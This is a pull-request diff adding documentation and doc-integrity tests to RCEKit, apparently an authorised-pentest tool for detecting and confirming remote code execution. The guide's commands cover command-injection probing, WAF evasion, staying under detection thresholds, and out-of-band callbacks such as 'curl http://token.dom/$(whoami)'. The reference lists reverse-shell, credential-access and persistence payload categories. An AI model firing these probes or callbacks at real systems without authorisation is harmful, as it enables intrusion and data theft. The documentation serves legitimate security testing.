+|---|---|
+| `--verify-body-location json_string` | JSON body — escapes for JSON, **no** percent-encoding |
+| `--verify-body-location form_value` | `application/x-www-form-urlencoded` body |
+| `--verify-body-location raw` | the payload must go on the wire verbatim |
+| `--verify-url-location url_path` | `FUZZ` sits in the path, not a query value |
+| `--verify-url-location raw` | no URL encoding at all |
+
+If a run comes back `negative` but you can see your input echoed somewhere in the
+response, encoding is the first thing to suspect.
+
+---
+
+## Choosing methods
+
+`--methods` is additive — list everything you want to try, and each tier is
+reported separately.
+
+| You suspect | Use | Cost |
+|---|---|---|
+| Anything, first pass | `reflected,eval` | cheap, safe, no state change |
+| A shell sink (`system()`, backticks, `exec`) | `reflected` | cheap |
+| A template engine or expression language | `eval` | cheap |
+| Execution with no output at all | `time` | slow — each probe waits on a real delay |
+| No output, but you control a web root | `file` | writes files (see [No-egress targets](#no-egress-targets)) |
+
+**Scope the environments to cut noise.** The shell methods (`reflected`, `file`,
+`time`) apply to any environment whose runtime reaches a shell — the shell
+environments themselves *plus* the language runtimes, because PHP's `system()`,
+Python's `os.system()`, Node's `child_process.exec()`, Ruby's `system()`, Perl's
+backticks and Go's `os/exec` all hand the string to `/bin/sh`:
+
+```bash
+# A PHP app — still probes for command injection, with fewer irrelevant variants
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/x?p=FUZZ" \
+  --environments php --methods reflected,eval
+```
+
+A language runtime doesn't say which OS it runs on, so its probes take the Unix
+shape; `--environments windows` remains the way to get `cmd.exe` probes. The
+data-layer environments (`sql`, `graphql`, `mongodb`) are excluded from the shell
+methods — reaching a shell from those needs a different escalation, so `eval` is
+what applies there.
+
+---
+
+## When the sink filters separators
+
+Stripping `;` is the most common partial mitigation there is, and it stops nothing
+on its own — the same sink stays exploitable through a pipe, a chain operator or a
+newline. So the shell probes sweep `; `, `| `, `|| `, `&& ` and a newline **by
+default**, and a filter that drops any one of them is still reached.
+
+Both chain operators are tried on purpose: the command your input lands in may
+succeed or fail, and only one of `&&` / `||` fires either way.
+
+Once you know the sink's shape, narrow the sweep to cut the request count:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected \
+  --separators '| ,&& '
+```
+
+Write a newline as `\n`. A single-separator run (`--separators '; '`) is the
+quietest option when you already have a confirmed hit and just want to re-prove it
+for the report.
+
+---
+
+## Injecting inside quotes
+
+If the sink builds `ping '<input>'`, a leading `;` never fires — it is inside the
+quoted string. Use the matching context, whose break-out closes the quote and
+supplies its own separator:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected \
+  --contexts shell_single_quoted
+```
+
+Use `shell_double_quoted` for `ping "<input>"`. If you don't know which, pass both
+— they are cheap and mutually exclusive in practice.
+
+---
+
+## Whole-command sinks
+
+By default the shell probes assume there is a surrounding command to break out of
+(`system("ping " + input)`), so they lead with a separator. Some sinks instead run
+your input as the **entire** command — a `qx/$input/` backdoor, a bare
+`sh -c "$input"` — where there is nothing to break out of and a leading `;` is a
+shell syntax error that guarantees a false `negative`.
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/run?cmd=FUZZ" --methods reflected --sink-raw
+```
+
+`--sink-raw` sends the probes as bare commands and ignores `--separators`.
+
+---
+
+## Working around a WAF
+
+The default sends **clean, canonical** payloads: fewest variants, clearest
+confirmation, lowest false positives — on the assumption of authorised, WAF-free
+access. That default is a feature; noisy evasion buys blocked requests and muddy
+evidence.
+
+When there is genuinely a WAF in the path, `--evade low` opts into a single
+low-touch transform (`${IFS}` for spaces on Unix) for the shell probes:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected --evade low
+```
+
+It is deliberately minimal. If `low` isn't enough, the answer is usually a better
+injection context or a different separator, not heavier obfuscation.
+
+---
+
+## Blind targets
+
+No output channel at all? Timing is the fallback. RCEKit fires a controlled
+`0/N/2N` delay series and requires the response time to track it **linearly** — a
+one-off slow response (jitter, GC pause, noisy neighbour) fails the regression.
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" \
+  --methods reflected,time --time-base 3
+```
+
+Two things worth internalising:
+
+- **Timing never self-confirms.** There is no computed value to check, so a
+  positive timing result is reported `needs-review`, always. That is not RCEKit
+  hedging — it is the honest ceiling of the evidence.
+- **Always pair it with a results-based method.** Listing `reflected` alongside
+  `time` costs almost nothing and, if any output channel exists at all, upgrades
+  the finding from `needs-review` to `confirmed`.
+
+Raise `--time-base` on a slow or noisy target; the regression gets easier to
+separate from background variance as `N` grows, at the cost of a slower run.
+
+---
+
+## No-egress targets
+
+Internal target, no outbound connectivity, no output in the response — but you
+know a directory the web server writes and serves. Prove execution by writing a
+random token and fetching it back:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" \
+  --methods file --webroot /var/www/html --web-base-url https://target.example
+```
+
+This confirms execution **plus** a write primitive, with no external listener
+anywhere in the picture.
+
+**It changes target state.** One file per confirmed probe, which is why the method
+is gated behind both `--webroot` and `--web-base-url`. RCEKit prints an exact
+`rm`/`del` **cleanup command** for every finding — run it before you leave, and
+paste it into the report so the client can verify the target was left clean.
+
+A stale file can't produce a false positive: both the filename and the token are
+freshly random each run.
+
+---
+
+## Out-of-band callbacks
+
+For blind classes that reach out — Log4Shell/JNDI, DNS exfil, async jobs — RCEKit
+ships its own HTTP/DNS listener, so you don't need interactsh or Collaborator.
+
+Generate OOB payloads with a domain you control, then listen and correlate:
+
+```bash
+python rcekit.py --acknowledge-consent --categories oob \
+  --oob-domain your-id.oob.example.com --output oob.txt
+
+python rcekit.py --listen --correlate oob.txt.map.jsonl \
+  --listen-http-port 8080 --listen-dns-port 53
+```
+
+```
+[HIT] http token=8k2hn1ufohpv from 10.0.0.5 -> ; curl http://8k2hn1ufohpv.oob.example.com/ [oob/raw]
+```
+
+Each payload carries a unique token, recorded in a `.map.jsonl` manifest, so every
+callback maps back to the exact payload that caused it. Correlation matches the
+token in the callback **host or path**, so exfil shaped like
+`curl http://token.dom/$(whoami)` still resolves.
+
+For a real engagement, point the OOB domain's NS/A records at the listener; port
+53 needs root. In a lab, skip the DNS delegation and aim payloads straight at the
+listener's address.
+
+---
+
+## Multi-step chains
+
+A single request cannot reach a sink that sits behind a login, arrives inside
+**uploaded file content**, or executes **blind/async** minutes later.
+`--verify-chain` drives an ordered, cookie-aware flow — login → CSRF extraction →
+prerequisites → payload delivery → trigger — and confirms either **in-band** (a
+`match` oracle on a chosen step) or **out-of-band** (a `{callback}` URL received by
+the built-in listener).
+
+```json
+{
+  "base": "https://target.example",
+  "callback_host": "10.0.0.5", "listen_port": 8877, "confirm_step": "trigger",
+  "steps": [
+    {"name": "csrf",   "method": "GET",  "path": "/login", "extract": {"csrf": "csrf_token\" value=\"([^\"]+)"}},
+    {"name": "login",  "method": "POST", "path": "/login", "form": {"csrf": "{csrf}", "user": "u", "pass": "p"}},
+    {"name": "upload", "method": "POST", "path": "/import", "multipart": {"file": {"field": "f", "filename": "x_{token}.sql", "content": "FUZZ"}}},
+    {"name": "trigger","method": "POST", "path": "/import/run", "json": "{\"file\": \"x_{token}.sql\"}"}
+  ]
+}
+```
+
+```bash
+python rcekit.py --acknowledge-consent --environments postgres --categories code_execution \
+  --contexts raw --encodings none --verify-active-risk intrusive --verify-chain chain.json
+```
+
+Each step is a `method` + `path` (+ optional `headers`) with exactly one body of
+`body` (raw), `json`, `form`, or `multipart`. Three substitutions do the work:
+
+| Marker | Meaning |
+|---|---|
+| `FUZZ` | where the payload goes — including inside uploaded file content |
+| `{var}` | a value captured by an earlier step's `extract` regex |
+| `{token}` | a per-payload unique value, for correlating the trigger back to the delivery |
+
+---
+
+## Reading the results
+
+| Verdict | What it means | What to do |
+|---|---|---|
+| **`confirmed`** | Execution proven. The evidence line shows the exact value the target computed. | Put it in the report. |
+| **`needs-review`** | A real candidate — e.g. a linear timing response — but not proof on its own. | Manual follow-up. Never report as proven. |
+| **`negative`** | Reached the target, found no evidence. | Suspect [encoding](#landing-the-payload-intact) or [sink shape](#whole-command-sinks) before concluding it's safe. |
+| **`inconclusive`** | Evidence appeared, but also appears *without* the payload — so it isn't attributable to execution. | Not a finding. This is the false positive that never made it out. |
+| **`error`** | The request never reached the target — a delivery or TLS failure. | Fix connectivity, then re-run. For a self-signed cert, add `--insecure`. |
+
+`error` is kept separate from `negative` on purpose: a connectivity problem must
+never read as "not vulnerable".
+
+<details>
+<summary><b>Why a <code>confirmed</code> can't be a false positive</b></summary>
+
+<br>
+
+Every confirmation is **differential** and built on a value RCEKit picked at
+random, so reflection or coincidence can't produce it:
+
+- **Results-based (`reflected` / `eval`)** — the expected value is a tag-wrapped
+  sum or a boundary-fenced product of random operands. A target that merely echoes
+  the payload returns the literal `$((a+b))` / `a*b`, never the computed value.
+  The value is also checked against a payload-free control, and the search is
+  encoding-aware (a base64/hex/url/html-encoded output still confirms).
+- **Timing (`time`)** — a controlled `0/N/2N` series must produce a *linear*
+  response-time increase; a one-off slow response fails the regression. Timing has
+  no computed value, so it never self-confirms.
+- **File (`file`)** — the fetched file must contain the random token; a stale file
+  can't match, because the filename and token are fresh each run.
+
+</details>
+
+---
+
+## Keeping the run quiet
+
+Verification is active traffic. When the engagement calls for restraint:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected \
+  --separators '; ' --contexts raw --environments unix \
+  --verify-delay 2 --max-payloads 20
+```
+
+- `--verify-delay` — seconds between requests, for rate limits and for staying
+  under detection thresholds.
+- `--separators` / `--contexts` / `--environments` — every narrowing cuts probes.
+- `--max-payloads` — a hard cap, sampled round-robin so the remaining probes stay
+  balanced across variants rather than all coming from one bucket.
+- `--verify-timeout` — lower it on a fast target so dead probes fail quickly.
+
+Note that `--max-payloads` caps *generation*, so combine it with the narrowing
+flags rather than relying on it alone to pick the interesting probes.
+
+---
+
+## Troubleshooting
+
+**"Payload corpus is not usable" / RCEKit refuses to start.** The payload corpus
+(`templates/payloads.json`) is missing or unparseable. RCEKit exits non-zero
+rather than silently testing nothing:
+
+```bash
+python rcekit.py --doctor
+```
+
+Run it from the repository root, or point `--template-file` at a valid corpus.
+Note that YAML templates are not supported — the corpus is JSON.
+
+**A run reports that it built no probes, and exits non-zero.** Your filters
+excluded everything — commonly `--environments sql` with a shell method, or a
+`--deny-chars` set that removed every candidate. A run that tested nothing is
+never reported as a clean result, which is why this is an error rather than a
+`negative`.
+
+**Everything comes back `error`.** The requests aren't reaching the target. Check
+the printed scheme if you used `-r` (see
+[Point at a captured request](#point-at-a-captured-request)), add `--insecure` for
+a self-signed certificate, and confirm the host is reachable at all.
+
+**A known-vulnerable target comes back `negative`.** In rough order of likelihood:
+[payload encoding](#landing-the-payload-intact), a
+[whole-command sink](#whole-command-sinks) needing `--sink-raw`, a
+[quoted context](#injecting-inside-quotes), a
+[filtered separator](#when-the-sink-filters-separators), or a blind sink that
+needs [`time`](#blind-targets) or [`file`](#no-egress-targets).
+
+**Where the logs go.** Execution logs land in `rcekit.log`; every
+exploitation/verification run is additionally recorded in `exploit_audit.log`.
+Both are worth attaching to an engagement's evidence bundle.

--- a/docs/reference.md
+++ b/docs/reference.md
@@ -1,0 +1,188 @@
+# Reference
+
+Every flag and every taxonomy, grouped by what you are trying to do. If you are
+looking for *how to use these together*, the [field guide](guide.md) is the better
+starting point — this page is for looking things up once you know what you want.
+
+**Contents**
+
+- [Choosing the target](#choosing-the-target)
+- [Detection methods](#detection-methods)
+- [Sink shape](#sink-shape)
+- [Safety &amp; consent](#safety--consent)
+- [Out-of-band listener](#out-of-band-listener)
+- [Generation &amp; output](#generation--output)
+- [Diagnostics](#diagnostics)
+- [Environments](#environments)
+- [Categories](#categories)
+- [Contexts](#contexts)
+- [Encodings](#encodings)
+- [Code-execution sinks](#code-execution-sinks)
+- [Exit codes](#exit-codes)
+
+---
+
+## Choosing the target
+
+| Option | Description | Default |
+|---|---|---|
+| `--verify-url` | Authorised target URL with a `FUZZ` marker | None |
+| `--verify-method` | HTTP method for `--verify-url` | `GET`, or `POST` with `--verify-data` |
+| `--verify-data` | Request body; put `FUZZ` where the payload goes | None |
+| `--verify-header` | Header `'Name: value'` (repeatable); may contain `FUZZ` | None |
+| `-r`, `--request-file` | Raw HTTP request to inject into (mark with `FUZZ`/`*` or `-p`) | None |
+| `-p`, `--param` | Parameter/field/header/cookie to inject into for `-r` (query → body → header → cookie) | None |
+| `--request-scheme` | `http` / `https` for the URL built from `-r` | auto |
+| `--verify-url-location` | Where `FUZZ` sits in the URL: `query_value`, `url_path`, `raw` | `query_value` |
+| `--verify-body-location` | How to encode `FUZZ` in the body: `json_string`, `form_value`, `raw` | auto |
+| `--verify-delay` | Seconds between verification requests (rate limiting) | `0` |
+| `--verify-timeout` | Per-request timeout in seconds | `8` |
+| `--insecure` | Skip TLS certificate verification, like `curl -k` | Off |
+| `--verify-chain` | JSON chain profile for multi-step, session-aware verification | None |
+
+## Detection methods
+
+| Option | Description | Default |
+|---|---|---|
+| `--methods` | Comma-separated: `reflected`, `eval`, `file`, `time` | None |
+| `--webroot` | (`file`) server-side directory the target writes and serves | None |
+| `--web-base-url` | (`file`) base URL that serves `--webroot` | None |
+| `--time-base` | (`time`) base delay `N`; the regression fires `0/N/2N` | `2.0` |
+| `--separators` | Break-out separators for shell probes; `\n` = newline | `; `, `\| `, `\|\| `, `&& `, newline |
+| `--evade` | WAF posture: `none`, or `low` for minimal `${IFS}`-for-spaces | `none` |
+
+| `--methods` value | Confirms | Tier it can reach |
+|---|---|---|
+| `reflected` | OS command injection, via computed arithmetic | `confirmed` |
+| `eval` | SSTI / SpEL / OGNL / Groovy / raw `eval()`, via a computed product | `confirmed` |
+| `file` | Execution + a write primitive, via write-and-fetch | `confirmed` |
+| `time` | Blind execution, via a linear `0/N/2N` regression | `needs-review` only |
+
+## Sink shape
+
+| Option | Description | Default |
+|---|---|---|
+| `--sink-raw` | Sink runs the input as the whole command — send bare probes, no leading separator | Off |
+| `--sink-needs-separator` | Input is concatenated mid-command — keep only separator-led payloads | Off |
+| `--sink-blind` | Sink returns no output — keep only OOB/timing-confirmable payloads | Off |
+| `--sink-decodes` | Encodings the sink decodes before use (e.g. `base64`) | None |
+| `--deny-chars` | Drop payloads containing any of these characters | None |
+| `--max-length` | Drop payloads longer than this | None |
+| `--target-profile` | JSON profile supplying the above as defaults | None |
+
+## Safety &amp; consent
+
+| Option | Description | Default |
+|---|---|---|
+| `--acknowledge-consent` | Required to generate or fire exploitation payloads | Off |
+| `--verify-active-risk` | Highest safety tier verification may fire: `safe`, `intrusive`, `stateful` | `safe` |
+| `--verify-allow-destructive` | Allow destructive payloads (persistence, backdoors) | Off |
+| `--max-safety` | Highest safety tier to include in **file output** | `safe`–`intrusive` |
+| `--include-blocking` | Include blocking or timing-based payloads excluded by default | Off |
+| `--watermark` | Embed a traceable token in each exploitation payload | Off |
+
+`--verify-active-risk` governs what is **fired**; `--max-safety` governs what is
+**written**. They are independent on purpose.
+
+## Out-of-band listener
+
+| Option | Description | Default |
+|---|---|---|
+| `--listen` | Run the built-in HTTP+DNS listener | Off |
+| `--correlate` | `.map.jsonl` manifest mapping received tokens back to payloads | None |
+| `--listen-http-port` | HTTP port for the listener | `8080` |
+| `--listen-dns-port` | UDP DNS port (use `53` for real DNS — needs root + NS delegation) | `5335` |
+| `--listen-answer-ip` | IP returned by the listener's DNS answers | `127.0.0.1` |
+| `--listen-log` | Append received hits to this file as JSONL | None |
+| `--oob-domain` | Collaborator/interactsh domain; each payload gets a unique subdomain token | None |
+
+## Generation &amp; output
+
+| Option | Description | Default |
+|---|---|---|
+| `-o`, `--output` | Output file, or base directory for `burp`/`nuclei` | `rce_payloads.txt` |
+| `--output-format` | `text`, `jsonl`, `burp`, `ffuf`, `nuclei` | `text` |
+| `--environments` | Restrict generation to these environments | All |
+| `--categories` | Restrict generation to these categories | All |
+| `--contexts` | Restrict generation to these contexts | All compatible |
+| `--encodings` | Restrict generation to these encodings | mode-specific |
+| `--max-payloads` | Cap payloads (balanced round-robin sample) | Unlimited |
+| `--detection-only` | Benign canary/timing probes for safe validation (no consent needed) | Off |
+| `--include-metadata` | Write a `.meta.jsonl` sidecar (indicators, tiers, notes) | Off |
+| `--template-file` | Custom JSON payload corpus | `templates/payloads.json` |
+| `--attacker-ip` | Substituted into reverse-shell payloads | `192.168.1.100` |
+| `--attacker-domain` | Substituted into download-execute payloads | `attacker.com` |
+
+## Diagnostics
+
+| Option | Description |
+|---|---|
+| `--doctor` | Check corpus integrity (found, parses, payload counts); exits non-zero if missing or empty |
+| `--version` | Print the version and exit |
+
+---
+
+## Environments
+
+`unix`, `windows`, `nodejs`, `python`, `php`, `java`, `dotnet`, `ruby`, `perl`,
+`go`, `docker`, `kubernetes`, `graphql`, `mongodb`.
+
+The shell methods (`reflected`, `file`, `time`) apply to the shell environments
+and to the language runtimes, since each hands its string to `/bin/sh`. The
+data-layer environments (`sql`, `graphql`, `mongodb`) are excluded from those
+methods — `eval` is what applies there.
+
+## Categories
+
+`basic_enum`, `file_operations`, `network_operations`, `code_execution`,
+`download_execute`, `reverse_shells`, `credential_access`, `privilege_escalation`,
+`persistence`, `cloud_metadata`, `database_enumeration`, `lateral_movement`,
+`container_escape`, `waf_bypass`, `oob`, `nosql_injection`, `graphql_injection`.
+
+## Contexts
+
+Each context carries an escape rule, so the payload survives the container it is
+delivered in.
+
+**Language / structural break-outs** (default): `raw`, `html`, `attribute`,
+`attribute_unquoted`, `javascript`, `sql`, `php`, `unix_shell`, `windows_cmd`,
+`powershell`, `shell_single_quoted`, `shell_double_quoted`, `graphql_string`.
+
+**Transport / serialization** (opt-in): `json`, `graphql_variable`, `xml`,
+`xml_cdata`, `yaml`, `http_header`.
+
+## Encodings
+
+**Self-contained** (default set) — run as-is on the sink: `none`, `url_encode`,
+`double_url_encode`, `random_case` (for case-insensitive runners),
+`base64_decode_exec` (carries its own `base64 -d | sh`).
+
+**Decoder-required** (opt-in) — only valid where the sink itself decodes the
+input, via `--sink-decodes`: `base64`, `hex`, `base64_then_url`, `double_base64`.
+
+## Code-execution sinks
+
+For `--categories code_execution`:
+
+| Environment | Sinks |
+|---|---|
+| Node | `child_process_exec`, `*_ssti`, `vm_eval`, `deserialization`, `expression_template` |
+| Python | `os_system`, `subprocess`, `jinja2_ssti`, `exec_ast` |
+| PHP | `exec_system`, `eval`, `deserialize` |
+| Java | `runtime_exec`, `freemarker/velocity/thymeleaf_ssti`, `spel`, `ognl`, `groovy`, `deserialization` |
+| .NET | `process_start`, `deserialize` |
+| Ruby | `kernel_system`, `erb_ssti` |
+| Perl | `system_backticks` |
+| Go | `os_exec` |
+| Postgres | `psql_meta_command` |
+| Mongo | `operator_injection`, `where_js`, `server_side_js` |
+| GraphQL | `introspection`, `injection`, `batching` |
+
+## Exit codes
+
+| Code | Meaning |
+|---|---|
+| `0` | The run completed. For verification this includes a clean `negative` — the target was tested and no evidence was found. |
+| non-zero | The run did not produce a trustworthy result: the payload corpus is missing or unparseable, `--doctor` failed, or the filters built no probes at all. |
+
+A run that tested nothing is never reported as a clean result.

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.20.0"
+__version__ = "2.20.1"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 

--- a/tests/test_docs.py
+++ b/tests/test_docs.py
@@ -1,0 +1,172 @@
+"""Documentation integrity tests.
+
+The docs are split across README.md and docs/, which makes them easy to drift
+apart: a renamed heading silently breaks a cross-link, and a new CLI flag lands
+undocumented. These tests keep the published docs honest without any external
+dependency.
+"""
+
+import html
+import re
+import subprocess
+import sys
+import unittest
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+import rcekit
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+SCRIPT = REPO_ROOT / "rcekit.py"
+README = REPO_ROOT / "README.md"
+DOCS_DIR = REPO_ROOT / "docs"
+
+FENCE_RE = re.compile(r"^\s*```", re.MULTILINE)
+LINK_RE = re.compile(r"!?\[[^\]]*\]\(([^)\s]+)\)")
+HEADING_RE = re.compile(r"^(#{1,6})\s+(.*?)\s*$")
+OPTION_RE = re.compile(r"--[A-Za-z][A-Za-z0-9-]*")
+# Flag declarations as argparse prints them: two spaces, the flags, then a run of
+# whitespace before the description. Reading only this leading segment keeps the
+# prose inside each help string — which name planned, not existing, flags — out.
+DECLARATION_RE = re.compile(r"^ {2}(-\S[^ ]*(?:[ ,][^ ]+)*?)(?: {2,}|$)")
+
+
+def markdown_files():
+    return [README] + sorted(DOCS_DIR.glob("*.md"))
+
+
+def strip_code_fences(text):
+    """Drop fenced blocks so sample output and payloads aren't parsed as markdown."""
+    parts = FENCE_RE.split(text)
+    return "".join(parts[::2])
+
+
+def slugify(heading):
+    """Reproduce GitHub's heading-anchor algorithm."""
+    text = html.unescape(heading)
+    text = re.sub(r"`([^`]*)`", r"\1", text)
+    text = re.sub(r"[*_]", "", text)
+    text = re.sub(r"[^\w\s-]", "", text.lower())
+    return text.strip().replace(" ", "-")
+
+
+def anchors_of(path):
+    body = strip_code_fences(path.read_text(encoding="utf-8"))
+    found = set()
+    for line in body.splitlines():
+        match = HEADING_RE.match(line)
+        if match:
+            found.add(slugify(match.group(2)))
+    return found
+
+
+def links_of(path):
+    body = strip_code_fences(path.read_text(encoding="utf-8"))
+    return LINK_RE.findall(body)
+
+
+class VersionBadgeTestCase(unittest.TestCase):
+    def test_readme_badge_matches_dunder_version(self):
+        """A stale badge misreports which release a reader is looking at."""
+        text = README.read_text(encoding="utf-8")
+        match = re.search(r"\*\*Version\s+(\d+\.\d+\.\d+)\*\*", text)
+        self.assertIsNotNone(match, "README has no '**Version X.Y.Z**' badge")
+        self.assertEqual(
+            match.group(1),
+            rcekit.__version__,
+            "README version badge is out of sync with rcekit.__version__",
+        )
+
+
+class DocLinkTestCase(unittest.TestCase):
+    def test_relative_links_resolve(self):
+        broken = []
+        for path in markdown_files():
+            for target in links_of(path):
+                if target.startswith(("http://", "https://", "mailto:", "#")):
+                    continue
+                relative = target.split("#", 1)[0]
+                if not relative:
+                    continue
+                if not (path.parent / relative).exists():
+                    broken.append(f"{path.name} -> {target}")
+        self.assertEqual(broken, [], f"broken relative links: {broken}")
+
+    def test_anchors_resolve(self):
+        broken = []
+        for path in markdown_files():
+            for target in links_of(path):
+                if target.startswith(("http://", "https://", "mailto:")):
+                    continue
+                if "#" not in target:
+                    continue
+                relative, anchor = target.split("#", 1)
+                if not anchor:
+                    continue
+                destination = path if not relative else path.parent / relative
+                if destination.suffix != ".md" or not destination.exists():
+                    continue
+                if anchor not in anchors_of(destination):
+                    broken.append(f"{path.name} -> {target}")
+        self.assertEqual(broken, [], f"links to missing headings: {broken}")
+
+    def test_readme_points_at_every_doc_page(self):
+        """A docs page nothing links to is a page nobody finds."""
+        linked = {
+            target.split("#", 1)[0]
+            for target in links_of(README)
+            if target.startswith("docs/")
+        }
+        for page in sorted(DOCS_DIR.glob("*.md")):
+            self.assertIn(
+                f"docs/{page.name}", linked, f"README does not link to docs/{page.name}"
+            )
+
+
+class CLIDocumentationTestCase(unittest.TestCase):
+    """Guard against the CLI and its reference page drifting apart."""
+
+    @classmethod
+    def setUpClass(cls):
+        result = subprocess.run(
+            [sys.executable, str(SCRIPT), "--help"],
+            cwd=str(REPO_ROOT), capture_output=True, text=True, timeout=120,
+        )
+        assert result.returncode == 0, result.stderr
+        options = set()
+        for line in result.stdout.splitlines():
+            declaration = DECLARATION_RE.match(line)
+            if declaration:
+                options.update(OPTION_RE.findall(declaration.group(1)))
+        cls.cli_options = options - {"--help"}
+        cls.reference_text = (DOCS_DIR / "reference.md").read_text(encoding="utf-8")
+
+    def test_help_output_was_parsed(self):
+        # A guard on the test itself: if argparse ever changes its help layout,
+        # the two tests below would silently pass on an empty set.
+        self.assertGreater(len(self.cli_options), 30)
+        self.assertIn("--verify-url", self.cli_options)
+        self.assertIn("--request-file", self.cli_options)
+
+    def test_every_cli_option_is_documented(self):
+        undocumented = sorted(
+            option for option in self.cli_options
+            if not re.search(rf"`{re.escape(option)}`", self.reference_text)
+        )
+        self.assertEqual(
+            undocumented, [], f"flags missing from docs/reference.md: {undocumented}"
+        )
+
+    def test_reference_documents_no_phantom_options(self):
+        # Only flags written as code, so heading anchors like `#safety--consent`
+        # aren't mistaken for a documented `--consent`.
+        documented = set(re.findall(r"`(--[A-Za-z][A-Za-z0-9-]*)`", self.reference_text))
+        phantom = sorted(documented - self.cli_options)
+        self.assertEqual(
+            phantom, [], f"docs/reference.md documents non-existent flags: {phantom}"
+        )
+
+
+if __name__ == "__main__":
+    unittest.main()


### PR DESCRIPTION
## Why

Two problems with the README as it stood:

1. **It never named a competing tool.** "Why not commix?" is the first question a reader asks, and the answer was not on the page where it gets asked.
2. **It was a reference manual pretending to be a landing page.** The full 35-row option table and every taxonomy list sat inline, so a reader deciding whether to try RCEKit scrolled past reference material to get anywhere — and the payload-generation section blurred the detection-first positioning it is meant to support.

## What changed

**A fair comparison.** A new "How RCEKit compares" section covering commix, SSTImap (and the unmaintained tplmap), Nuclei, and interactsh/Burp Collaborator, on the axis that actually distinguishes them: what each tool is built for, which RCE classes it covers, what infrastructure it needs, and where it stops. It includes an explicit **"use the other tool when"** section — wanting a shell, sweeping thousands of hosts for known CVEs, or already having Collaborator — so the table reads as orientation rather than promotion. The claims about the other tools are drawn from their own documentation.

**A documentation split.** README goes from 544 to 260 lines while total documentation grows:

| Page | Contents |
|---|---|
| `docs/guide.md` | Example-driven field guide, organised by the situation you are in rather than by flag: captured requests, payload encoding, filtered separators, quoted sinks, whole-command sinks, WAFs, blind and no-egress targets, OOB callbacks, multi-step chains, reading verdicts, troubleshooting. |
| `docs/generation.md` | RCEKit as a payload generator: target profiles, sink shape, and the Burp/ffuf/Nuclei exports. |
| `docs/reference.md` | Every flag, grouped by task, plus environments, categories, contexts, encodings, code-execution sinks and exit codes. |

The README keeps the proof GIFs, the verdict-tier model and the honest-scope note, and gains a "find your situation" index that routes into the guide. The intent is that lists remain available for lookup, but the first thing a new user meets is a worked example.

## Tests

New `tests/test_docs.py` (7 tests) guards the split against drift:

- the README version badge must match `__version__`;
- every relative link across README and `docs/` must resolve (75 checked);
- every heading anchor must exist in its target file (57 checked), using GitHub's slug algorithm;
- every docs page must be linked from the README;
- every CLI flag must appear in `docs/reference.md`, and the reference must not document a flag that does not exist.

The last pair is the one that matters long-term: the reference can no longer silently fall behind `argparse`. Verified non-vacuous by breaking an anchor and the badge and confirming both tests fail.

Full suite: 186 tests, all passing (was 179).

## Version

`2.20.0` → `2.20.1` (documentation only; no behaviour change).
